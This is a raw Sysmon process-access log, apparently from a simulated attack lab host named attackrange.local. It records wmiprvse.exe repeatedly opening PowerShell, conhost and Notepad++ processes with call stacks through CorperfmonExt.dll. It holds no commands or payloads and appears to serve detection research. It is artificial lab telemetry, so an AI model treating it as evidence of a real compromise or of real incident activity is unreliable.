21:43:48.559{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149808Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.559{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149807Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.559{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149806Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.558{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149805Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.558{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149804Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149803Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DF03-00000000D101}5496C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149802Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149801Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-266F-60CA-DE03-00000000D101}1224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149800Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149799Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149798Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.557{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149797Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.556{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149796Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.556{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149795Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.556{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149794Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.555{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149793Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.555{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149792Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.555{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149791Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.555{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149790Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.555{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149789Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.554{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149788Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.554{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149787Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.554{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149786Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.552{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149785Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 